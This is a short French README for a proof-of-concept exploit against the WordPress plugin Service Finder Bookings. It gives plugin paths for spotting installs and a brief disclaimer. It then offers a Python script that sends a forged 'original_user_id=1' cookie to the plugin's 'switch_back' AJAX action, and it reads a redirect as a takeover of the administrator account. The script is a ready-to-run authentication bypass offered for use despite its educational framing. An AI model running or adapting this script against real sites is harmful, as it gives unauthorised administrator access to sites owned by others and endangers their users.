
Un mini exploit pour le plugin WP Service Finder -Bookings
Le plugin Service Finder est un système de réservation et de gestion de services pour WordPress.
En raison de sa popularité et de sa complexité, certaines versions ont présenté des problèmes de sécurité liés à des points de terminaison AJAX non authentifiés ou à des contrôles d'accès inappropriés.
Ce README explique comment les chercheurs peuvent identifier en toute sécurité les installations et suivre des pratiques éthiques (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ Avertissement :
Ces recherches sont uniquement à des fins éducatives et de recherche. Ne tentez pas d'accès non autorisé ou d'exploitation.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399 : ✅ VULNÉRABLE ! Redirection vers le panneau d'administration en tant qu'ADMIN400-499 : ⚠️ Erreur client — la requête était invalide ou non autorisée, pas vulnérable